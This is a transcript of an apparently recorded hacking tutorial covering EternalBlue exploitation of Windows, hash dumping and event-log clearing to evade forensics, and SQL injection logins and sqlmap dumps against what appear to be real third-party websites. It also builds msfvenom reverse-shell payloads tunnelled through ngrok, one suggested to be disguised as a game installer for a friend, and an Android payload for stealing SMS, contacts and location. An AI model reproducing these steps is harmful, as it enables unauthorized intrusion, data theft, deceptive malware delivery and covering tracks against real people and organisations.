So good afternoon all. Sorry for the delay due to some technical difficulties. Okay, so today we are here to talk about cyber security, and I'm going to show you that how to do some how to perform some techniques or attacks. Okay, in cyber security field. Okay, so first of all I will start with Windows remote hacking. Okay, so Windows is the most widely used computer operating system, right, in the world. So what if I tell you that Windows can be hacked without sending any payloads or any virus or trojan? Windows can be hacked remotely without touching even the victim's computer. Okay, so today I'm going to show you how to do that. Okay, so for that I need to start my virtual box over here. Okay, so I have Windows installed in my virtual box, so I'm going to start it. Okay, that's odd. It says it is going to install the Windows once again. Okay, no problem. Okay. I think it's already installed, so there's something wrong with this. Okay, let me check. Yeah, okay, now so my Windows is starting here. Now as you can see, I'm selecting here my home network and everything. Okay, let me check the IP here. Okay, everything is fine. Okay, so now I'm going to check my best machine IP, which is I'm using the Parrot operating system here. Okay, many of you can use Kali Linux also. Okay, Kali and Parrot, they're both almost the same thing. All Debian based Linux distributions, and obviously they both are created to do ethical hacking and all. Okay, so in order to hack Windows remotely, at first we need to scan. Suppose I don't know that what is the IP of my of the victim's Windows, so I have to start a scan. So I will start with nmap -o and my network is 192.168.100.0/24. So I'm going to scan my whole network first. Okay, it requires root privileges, so I have to get sudo here. Okay, so the scan has been started. So the nmap here will do what? Nmap will scan each and every device which is connected to my network. And for this my hyphen capital O, it will give me the possible operating system those IPs are using. So let's wait for that. So yeah, can you guys hear me properly? Okay, just let me check once again. Okay, the scan is running. Okay, so as you can see, now the scan is completed. So yeah, so as you can see here that how many IPs are connected with my network, which is 100.1. This I can say this is my access points IP, which we generally call a router. Then comes a Microsoft Windows operating system, as we can see, Windows 7. The OS guess is Windows 7 here. Okay, so now I know that this IP is using Windows over here. So now I know the IP. So I am going to copy this IP here. Now what can I do? Now I want to access that computer remotely. So I'm going to break into that computer. So for that I need a tool called MSF console or the Metasploit framework console. Okay, so now the Metasploit is open. So now I have to check if I can break into that system. So for that I need to do a vulnerability assessment. I need to find a vulnerability for that operating system. Now many of us don't know that Windows has some certain vulnerabilities inbuilt in it. Okay, that is the manufacturer vulnerability. So that vulnerability is called MS17010. So now I have to check if that computer is vulnerable with that vulnerability. Okay, so now I'm going to search some auxiliaries here. We can see auxiliary. So I'm going to search some scanners. So here in the auxiliary, I need to find that vulnerability name. So I'm going to copy it, and I'm going to use it over here. That use auxiliary scanner SMB MS17010. That is the name of the vulnerability we can find in Windows operating systems. So I'm just going to hit enter. Okay, so now I need to check something. I'll go and type check show options. Okay, in the show options I can see that I have to set the R host over here. That is the IP of the remote host or the target host. So I need to set the R host. So the R host will be 192.168.100.194, which you have already targeted. Okay, so now the R port is also set. Now if I check with show options, I can see that the IP has been set in R host. Okay, so now I'm going to run it. So it says that host is likely vulnerable to MS17010. Okay, now I know that my host is vulnerable to MS17010. Now what I have to do? Now I just have to break into that system by using that vulnerability. So again, for that I need to run msf console. Okay, and now I need to search a payload, or I need to search for an exploit called Eternal Blue. Now this Eternal Blue is created to exploit that MS170 vulnerability. So I need to find this Eternal Blue here. So as you can see, there are many exploits are there, like this one is for Windows 8, this one is for different. So I'm going to use this can be for Windows 7. So I'm going to select and copy this, and now I'm going to use it. Okay, hit enter. So now I'm in this payload Windows /msmd/ms17010 Eternal Blue. Now again I need to check the options what I have to set. As you can see, everything is set except for R host. So again I have to set the R host for this, which is 192.168.100.194. Okay, now if I check show options again, and everything is set here, the R host is set. Now I can exploit. So I have started the exploit, and let me check the Windows over here. So I'm not touching I'm not even touching the Windows. I'm just now watching there's something pops up or not. Nothing. But if I get back to the terminal in my Parrot, I can see Win, and I can see the meter session over here. That means I have already completed the task. That means I am in the Windows operating system without even accessing that system. Okay, so now in meter I have to type help. Now you can do whatever you want. So there are many options we can do. So let's start with sysinfo here. Let me check if I am in the same system or not. So it says that yeah, I'm in the SAM PC Windows 7. So let me check if this PC's name is SAM PC or not. Yeah, it says SAM. Okay, so done. Now we can do whatever we want. We can download whatever we want, we can upload a file if we want. Okay, but before that, what you have to do, okay, that PC is restarting. Oh, again that part, no problem. Okay, so yeah, it says the interpreter session died, so I'm going to put the exploit once again. Let's see if it is working again or not. So I'm trying again to hack into the system here. The first one, it says fail. If we try again, sometime it will show you that the fail, but you just keep continue doing it and it will eventually come up. So okay, now, so if I want to extract the password from that Windows, I don't know the password, so if I want to extract, so I can use that run I can use this command to get the password of that Windows. Okay, so it says the SAM and the password part is this. Okay, so how do I know what is the password, because this is encrypted properly? So I need to open before that you must know that Windows encrypted their password in NTLM format. So NTLM decryptor, just search NTLM decryptor online, anything, and I need to paste that hash here. Now click on decrypt. Let's see if it is working properly or not. Okay, it cannot decrypt here, it cannot be decrypted from here, so let's check another one. Okay, no result found in the database again. So basically this hash is irreversible, so in their database there are no matching hash. Okay, but we have to keep trying because there are plenty of options where you can find our key. Is there anything we can find? No. Okay, let's start. Let's try another one. So it's loading. Let's see what happened. Okay, while it is continuing to doing that, what we can do also, we can use another tool called John the Ripper. Here we can also try to crack it. So what I have to do, I'm creating a plain text document here, and I'm pasting the hash file over here. Save. Okay, this was plain text.txt, and now I need something. If I write John format equals to lm, this is for the NTLM format for Windows, and I need to also mention a word list. So just you can download any word list from Google, or there are many inbuilt word lists are here also, but now I'm just going to create my own word list, just some simple ones. Let me rename it word.txt and rename it with hash.txt. Okay, that is much better. So I'm going to try many password over here, which is very common. Some common passwords here I'm trying here. Okay, so just create your own word list here. I'm going to save it. So now word list equals to, so I need the location of this word list, which is /home/background/desktop. So okay, slash word.txt, and finally the same location for the hash.txt. So I'm doing it. Okay, it says it hasn't find any common word list here. So what I'm going to do, I'm going to change this lm to NTLM. Let's try with NTLM, unknown ciphertext format. So I think LM will be perfect. Okay, then LM was quite good. Okay, so yeah, we couldn't reverse the hash here, but okay, doesn't matter. Then I can take screenshot from the desktop. I can try with the screenshot. Let's see if this command works or not. Some of this command works, some of this command doesn't. So here I can find the screenshot I have taken. So as you can see, I can take the screenshot of the victim screen also, what he is doing or not. And let me check if there is anything we can do. Screenshot, except for screenshot we can go for, I don't know, this is not going to work. Still, let's try. Yeah, okay. Now next one is, oh, the next one is very important, because after hacking into the system, it is very important that you must delete all your traces from the Windows machine, so that any cyber forensic expert cannot trace you back. So what you have to do, let me get back to my Windows, personalized desktop icons. Let's bring the my computer icon here. Okay, if we go to manage, let's get to event viewer. If we go to Windows log, we'll see there are plenty of log files where from where any cyber forensic expert can see our IP, that we are in this system or something. So what you have to do to tackle this, there is a command called clear rev, that means clear events. So if I clear those events, now I get back to the Windows again. Now I go to manage. Okay, now I go to manage, yeah, event viewer, Windows log. Now you see those application security logs are empty, because I have cleared all of them just to stay secure. Okay, so as you can see that you have to use proper antivirus and original Windows system, and you have to install the patch just to get rid of this kind of vulnerability. Okay, so otherwise within it will take not more than 15 seconds to hack into your system. Okay, so this is the first one. Now let's come to the web hacking part. But before the web hacking part, we must know that how can we find the website vulnerability, because everything, anywhere, if you want to attack in either in any computer system or any website or anywhere, if you want to attack, you just have to do what? You just have to do the vulnerability assessment testing. Without vulnerability assessment testing, it is not possible. So if I want to do, if I want to perform some attack on the website, I have to do some vulnerability testing. So today I'm going to show you the SQL injection part, that how we can hack into some databases and all. So it's still loading. Okay, I don't need to anymore. So great. Now I'm going to search Google Docs here. Okay, so as you can see, there are lots of Google Docs. These are just advanced searching methods of Google which can give us some pages where we can find some SQL injection vulnerabilities. Okay, so not every website will contain the vulnerability, but some of them. Okay, sorry for that. And okay, so I'm going to copy one of the docs and just go to Google and paste it here, and give some ID, suppose 1. So as you can see, there are lots of other websites are there. Now we just have to find that which website is vulnerable to SQL injection. So now how can we find that? Let's take this website over here. Okay, there are two techniques to find the vulnerability. First, we can directly check by putting one just one quotation over here, and if you see some error in the page called MySQL error or something, this page can be vulnerable. That doesn't mean that this page is vulnerable. This page can be vulnerable one. So this is my first finding. Or what we can do, we can take the page, the URL here. I'm going to copy the URL, and I'm going to use a tool which is inbuilt in your Kali or in your Parrot operating system, which is called Nikto Web Vulnerability Scanner. So I'm going to use the Nikto Web Vulnerability Scanner here. So how to perform with Nikto? So you have to just write Nikto -h. So you will see there are lots of options that how you can search some ports or plugins and everything through Nikto. So what I'm going to do, I'm just going to do Nikto -h, and I'm going to paste the URL over here. Okay, and I'm going to keep the tuning to 9. Now what is this? What does this mean? Tuning 9. Tuning 9 refers to SQL injection. So I'm going to find that if this website has any SQL injection vulnerabilities or not. It is showing me that it is using this server. Anti-click jacking framework is not present. That means click jacking attack can be performed in this. So XSS protection header is not defined. This header can hint to the user agent to protect against some forms XSS and everything. No CGI directory found use. Okay, it is scanning. Let the scan complete. Then we will see if there are any valuable information for us in it or not. Okay, if there are any more vulnerabilities. So you just have to be patient sometimes, because the scan does take time sometimes, because this Nikto is one of the best web vulnerability scanner. Okay, in all of the tools we have in Kali and all. So it says again, web server banner has changed from this to engines which may suggest a WAF. Now what is this WAF? This is web application firewall. That means this server has a web application firewall which can be used, or which can track my location if I want to hack into their databases. Okay, so I would recommend that if you see one of these, just you need to hide your IP, or just don't try it, because if you are not that much skillful, you will easily get caught. Now, okay, so the scan is completed. Web server returns a valid reason with junk HTTP methods, 529 0 errors, 5 items on remote host. Okay, so I'm not going to touch this because I have seen this web application firewall here. So okay, great. So that's why I said that this can be vulnerable. Okay, so I'm not going to risk it. So again, let's get to our next one. Copy. Okay. This is using the Apache server. Okay, while it completes the scan, I will show you some other things regarding SQL injection, because SQL injection is not only about just hacking into the database. Also, we can break password with minimal SQL queries. Many of you must know that, or if you don't, I'm going to explain it to you right now. Okay, so if I just so talking about the advanced search, so if I just write here site.pk enroll/admin, so I'm going to search all the sites which belongs to .pk, that means from our neighbors, and I want to find all the admin pages of those websites. So here there are lots of admin pages I can see. Let's try to get into some things. Okay, here I cannot see the login page, so next one here. Okay, so here I can see a login page here. So here I'm going to try a simple SQL query, which is, we all know, sometimes it works. Okay, so this is the same thing. So without knowing the ID and password, I can just enter into any website's admin panel in less than 2 seconds. Okay, that is the case here. If I log out, if I do it one more time, I'm going to show you. So it's 1 or 1 equals to 1, and the same thing you have to write it on password part. So let's get it to login. Okay, so now I am into this. So I can check anything if I want, the sales history, the inventory, but I'm not going to. Okay, because I'm in the admin panel right now, so I can do whatever I want. I can change the password and everything. But how did this happen? I mean, how a simple query like this can break into any username and password? So when, let's talk about the database over here. Okay, the structure of the database you have to understand for it. Okay, this is not just a simple query. This is a very effective query, and there are some advanced queries regarding this. Based on this. Okay, so you have to understand the database properly, that what does a database, how a database has been created, and how database queries work, and how this login and password queries work. Just select star from username, and or select star from the table name, where the username equals to this and the password equals to this. This is how the queries basically work. Now what I've done, when we enter the correct ID and password, user ID and password, they generate a true event, right? A true query. The same thing happening here. I am just forcing them to believe that I am giving them a true query, which is always true, which is 1 or 1, which is always true. Okay, so if there are no proper filters in the fields, suppose if you are developing a website, and if you don't put the filters in PHP, or in the I mean the sanitization part in PHP. If you don't take it seriously, then this might happen to your website also. Okay, so always remember about the secure coding. You have to code securely, just to avoid this kind of interruptions and this kind of attacks. Okay, so now let's see if the scan is complete. Okay, it's still going on. Now if I want to do okay, let's let the scan go on. So how can we uh, extract a database? Not like this, obviously, not like a not with the simple SQL query. There is a tool. There is a tool called SQL map. Okay, SQL map. Okay, so as you can see, there's a this is the tool. This SQL map can help us to extract a database. Okay, extract a database from some website, or from the backend. So now what you can do, we have to write SQL map hyphen u, which stands for URL. Now I have to put the URL here. Oh, not this one, sorry. This URL here I'm using. So I'm just copying this URL here. Let's check directly. And hyphen DBS. So if there are any databases connected to this, there are no firewalls, it will extract all the database names for me. So now it is going to try all the possible types of SQL injections, like there are union based, there are error based. Okay, so there are time based, there are blind SQL injections are there. Okay, so there are lots of SQL injection types of SQL injections are there. So it says it cannot find any databases. Okay, great. So yeah, I can stop it right now because that website is not helping. Okay, so now let's get to another website. Yeah, there's a website of a hotel over here. This hotel is from, okay, let me check first. Yeah, it says a SQL error, so just take it and try it with SQL injection. So again it is trying. Okay, it is taking some time. Okay, as I said, it's not like a movie. Just typing for 5 minutes, and a satellite can get hacked. This that is not the case here. Okay, so yeah, we have to wait. injection not exploitable in our values. Do you want to try to a random integer value? Okay. Yes, I want to keep testing. Okay, so finally I hit. Okay, so it shows there is a database called this. Okay, now I'm going to copy this database here. Now I know the which database. So in the database, what you can find, there are tables. So I'm going to write find tables from this database. So these are the table names, okay, which is in that database. So this looks interesting, the admin part. So I'm going to check if there is any data which can be used against the website, if I can extract. Okay, so here now I know the table name. In the table there are columns, so I know the table name now, which is admin. Okay, so it says there is password, there is ID, there is username in the text format. So this is the database variable types. And now, okay, so I want to extract this here. So how to extract? Just I'm going to dump this database. Let's see if I can find anything or not. So it says that the password is encrypted, I mean hashed, and so if I want to try any word list to crack that password. So it is going to use an inbuilt word list to crack the hash. Okay, so while it is cracking, we can try it with another website. There is another website I can see. First website is here. So this is the Asian Sports for All Association. Okay, this is a big website, I guess. So I'm going to try it here. So again, this kind of websites also has some MySQL error in it. So what I have to do now, we all know that. So just copy, open another terminal, just go for SQL math -u in the quotation, paste this, and happen DBS. So let's see if I can find anything or not. Oh, that was fast. So there are two databases here I can see. So again, I'm going to go for tables, and I will try this database over here. Okay, so in this there are lots of 14 tables I can see. So yeah, let's try this one. If I want to see all the members, so just copy it. That's quite interesting how easily you can get into any website database. So it is trying to fetch all the columns in this table. So as I can see there, so again I want, if I want to dump it, so just double click dump. And let's check the previous one. It is still trying to crack the hash here. Okay, so yeah, the language I don't understand here, but all the datas are here. Okay, so this is how you can easily hack into any databases. Okay. Okay, now yeah, we have all the database and all the details we can see, and yeah, I don't need this terminal, and this terminal is still trying to crack the hash. Again, the hash cracking is only possible if that hash is already in the database. Okay, otherwise it is kind of irreversible, you can say. Okay, so now another thing, we have talked about the vulnerability analysis and everything, and we have seen that how we can hack into any database. We have seen how to hack into any Windows system. Now the most important part you are forgetting, the first phase of ethical hacking, or the first phase of hacking, is information gathering, footprinting, reconnaissance, anything you can say. Okay, so there is a tool I'm going to show you today. The tool name is Multigo, which you can use to find all the domains connected to the website. Okay, so the tool is Multigo, so I'm going to use this tool here, Multigo. So I'm going to show you that how you can use Multigo to grab the hierarchy, the topology, and all the domain names of a network or of a website. Okay. Okay, it says memory settings are optimized. Okay, let's restart now. Okay, so Multigo is restarting. So I'm just showing you today that how attackers attack any computers or any website, and how they gather information about an organization and all. So here I can see there are lots of things, Multigo Excel, Multigo Classic, and okay, so I'm going to use this. Let's get to a tab called machines. Okay, so I just have to accept all the terms and agreement. Now it is asking me for login. So I don't have any account here, so let me show you how to create. So just click on register here. Just just going to close all the unnecessary tabs over here. This Oracle VMware I don't need anymore, so just close it. It's still running. Great. Okay, the registration part is okay. It's a little bit slow, I guess. Okay, just wait a minute. Also, I will show you today that how to attack outside of your network. That attack on Windows performed in the local network, but if I want to attack outside of my network, which is in wide area network, so I'm going to show you how to do that too. Okay, something is wrong, so just I'm going to type randomly something. Let's see what happens. If it is give me I don't know why the click links are not working. Okay, okay, great. Just leave it right there. I think it will come up eventually. Till then, I'll show you how to attack outside of your network, and that is one of the very popular questions we get every time, that how we can attack outside the network. So today I'm going to show you. We are going to use a tool or a software called NGRock. So just type NGRock and you will see ngrock.com. Just go to ngrock.com. So it will ask you for login or sign up. So I'm going to sign up first. So I'm not going to put any of my mail ID here. So just I'm going to a temp mail. So it will give me a temporary email address. So I'm going to copy this email address. I'm going to put my name as John. Paste the mail address, password 123456, and yeah. Okay. Mountains or hills? At least 10 characters. So 123456 7890. So signed up. Now I can see there is a option for download for Linux, so I'm going to download it for Linux. So let's get into that. Okay, so now I'm to go to unzip it. So I'm extracting this in the same folder. Successfully extracted. It's here. Now you have to open a terminal over here, and what you have to do in this terminal, this I have to copy and paste this part. So paste. So it says auto token self configuration. So now I can easily run it, but before that what I need to do, I'm going to copy it, go to file system, user bin. So why I'm pasting that ngrok here, because I want to access this ngrok from anywhere in this computer. Or you can just fire it up from here, that doesn't matter. The paste option is not here, so I have to go through terminal. cp ngrok and /usr/bin/. So it says I need sudo, I guess, for this. So yeah, okay. So it's now in the user bin. So now what I can do, I'll write ngrok tcp 8080. So I'm trying to create a TCP tunnel over here. So whenever I write that ngrok TCP 8080, I can see this forwarding port here, which is this. So this will become the new IP of, and this is going to be the new port address of mine. So how we can use it? Okay, let me fire up the Windows once again. I don't need this 10 mail and all now. Okay, still facing some problem. Let me cancel it, exit. I will open it later to see what is the problem with this, and close it. Okay, it's there. So I'm going to fire it up the VirtualBox. So I need to start the Windows here. Now my Windows and my kernel Linux is in the same IP. So what I have to do, I'm going to change the network setting here. From bridge I am doing it NAT, so that the network will change. Now if I type cmd, go to ipconfig, now I can see the IP is 10.0.2.15. okay, great. Now 10.0.2.15, and my kernel Linux, the IP of my kernel Linux belongs to completely different network. So now we are in the different network. So now I'll show you that how we can use it on the different network. So for that I need to clear it up, and I have to create a payload. Now I have taught you that how we can hack Windows without the payload. Now I will show you how to hack Windows with the payload, that too outside the network. So now I'm going to create the payload here. So you have to write MSF Venom. This is one of the MSF Metasploit framework payload generator, which is MSF Venom. Now I have to write the payload, which is -p stands for payload. Now the payload is for Windows / the computer is 64-bit architecture. So x64 / meterpreter / reverse _ TCP, and the L host, the listener host, that would be me, the attacker. Okay, so the listener host, no, I'm not going to type my IP here, obviously. So I'm going to what I'm going to type here, this IP. So I'm going to copy and paste this one, and in the L port I'm going to put this 11828, 11828, which is the forwarded port. Okay, now the format I need the payload is exe, and the name I'm going to put is let me get to my desktop. I need to know the location of my desktop, which is home/Batman/desktop. Okay, copy slash anything like cod.exe, that's Call of Duty.exe, suppose. So if you want to send this file to your friend, you just give them a Call of Duty game setup and replace the setup file with this. Okay, so now let's see what happens. So the cod.exe has been created. Great. Now what I have to do, I have to open the MSF console once again. Okay, now here we just have to use some exploit called use exploit /multi/handler. Okay, now we are in the multi-handler exploit. Now we have to set the payload once again. So set payload, which was Windows/x64/meter/reverse_TCP. Great. Now I will go for show options. Here I can see the lhost is not set, so I'm going to set the lhost, but this time I'm going to set the lhost to non-retrievable IP. Okay, so the set lhost done. Now I'm going to set the L port once again, which is 8080. We used in ngrok TCP 8080, so that port number we need. Set the L port and done. So I'm ready to exploit, but I need to send this to my victim first. So how can I send this to my victim? I'm going to open the Apache server here. So service Apache to start. So I'm just creating my own web server here. So it says that Apache 2 service failed to start Apache 2. Okay, doesn't matter. Also we can just get into any file uploader. So it says easy file upload is there. So here just drag and drop this file. No file password is required. Upload. Now I need to check all the traffic lights. I don't know. Yeah. Okay. So this is the address of my file. So yeah, I need to copy this and the same thing I need to paste it in my Windows system. So it's easyupload.io 1y76li. Okay, so let's get into a browser. So 1y76li 7 6 Li. Oh, it's only easy upload. So you can see there's a download option of my file, so I'm going to download this. Theory.exe is here. But the thing is I cannot see the download option. Okay, wait a minute. That's why nobody uses this window, Internet Explorer. I hate this. Okay, great. Okay, let's do one more thing. Go file. Theory.exe. Okay, go file.io/d. AISOEH. Okay, some kind of network issues. Okay, let's leave it here. So we are just going to try again. Service Apache 2 sudo it says Apache service not found. So how to tackle this problem? Okay, this kind of thing you can see. So we just have to install the Apache 2 first. Or we can do something else, like Just 1 second. So now this is I have already created the file here, but I cannot send it to the Windows. I'm not able to, but there are lots of other options. I can send it through WhatsApp and all. Okay, let's try one of these once again. Okay, it's asking me for login. Maybe then it will go away. Great one. Their explanation part is completed now. Okay, and now you can see. Okay, great. I have another option. I haven't think of it. Just create a template. So I'm going to create a temporary mail address here. Hmm. Something is not just adding up here. Okay, so what to do now? I'm going to try something else. Yeah, now I'm good. Okay, now all I have just to do is simply open the temp mail and done. Even this browser is not showing me that my temporary mails. Okay. And a proper mail service, but I cannot see it. That is very unfortunate that I couldn't show you. Now that's a lesson, because I have shown you that how to hack into systems, but I cannot transfer files between two systems. That is quite irritating. Does Google open here? I'm trying to send a mail here, but the mail is also not sending, so I don't know how to show you. Okay, then we just have to do exploit. If we just could drag and drop here, that would be better. Just 1 minute. Let it make bidirectional, then still not working. Let me see if I can do anything else. Bidirectional input. Okay, I'm trying hard to just get this file over here. I don't know if Gmail will support this or not. I can definitely send it to something outlook.com maybe. Okay. Now the message. Okay, I'm sending a mail here, and probably this time it will work. Okay, let's see if I have this message or not. The message has been sent, but it is not loading here. Let's see in the junk mail. Drafts, inbox. Okay, so there's no way I can't see this. So the final, I'll try finally. So if this happen, then happen. Okay, but the process is the same. They just have to send the file to the victim, and they just have to click it. That's it. You will get the interpreter session just like the previous one. That was the part, but I couldn't even send the file here. I mean, there are some difficulties. I don't know with these things, but that happens sometimes. Or I don't have any other Windows operating system here, so I could have just open it there. Or we can do just one more thing, that the same thing I can quickly show you for Android. That's a reverse TCP, and I can create the APK file for Android here quickly, and the same thing I can do here. Yeah, so I'm just send the file to the mobile, and my mobile is in the different network, obviously. I'm using the Geo internet here, and yeah, that's it. Just paste. Okay, so it's there. Now just I have to type MSF Venom, sorry, MSF console, and just to wait for it to open. The same process, go for Windows, go for Android, the process is same. Just use exploit slash multi slash handler and set payload once again with Android slash meter slash reverse underscore TCP, and you have to set the L host, which is 0.0.0.0, and I have to set the L port, which is 8080, and I just have to do the exploit part here. And what I have to do, just I have to install this in my phone. Let me install it. Where is this abcd.apk? Yeah, I got it. So I'm installing this abcd.apk in my phone. Let's see if the interpreter session comes or not. Eventually it will take some time, but it will come. Oh, sorry, my bad. I have to set the L port. I just wrote port. Now that's good. Okay, now the L port and L host has been set, and now I guess the meter precision will come eventually. Meter precision opened. You just have to wait for the right moment. It will open eventually. So it's outside my network. I'll show you once the meter precision comes. I'll show you the IP that it was outside my network, and as you can see this. Sometimes it is slower. Maybe because I have opened it too much. So lots of technical difficulties today, but eventually I have managed to, I guess, complete all of the attacks I wanted to show, just except for the Windows and the Multigo. In Android, security a bit high, that's why it is taking me a little bit of time. Okay, I just uninstalled the app. Now I'm going to install it again. Usually doesn't take this long, but okay. Yeah, finally the meter session came. So if I gonna show you the IP. Okay, it opened and it died too soon. The network is bit fluctuating here, my mobile network. That's why the problem is there, but it came. Okay, so this is how, and the same things you can do, like you can dump SMS, you can dump all the contact list from that victim's phone, or you can dump all the call logs, you can locate him with the geolocate. This all works. Okay, if you try, this will all work. Yeah, I think the network issue is too much here. That is the main problem. Okay, meter precision came, but it is, yeah, but it is not staying because of the net issues. But okay, that you can do, that you can install any app you want. You can check the app list, you can check the app run, you can just run any app from here, you can install any app. Okay, you must check our other videos where we show that how you can use meterpreter to get info from the Android mobiles. Okay, so that's it for today. uh, Thank you for the patience you have put here, guys. Thank you, and hopefully next time we will come with cleaner, much more cleaner videos, because in technical difficulties is not in our hands. Sometimes it just happens. So this is one of those days, and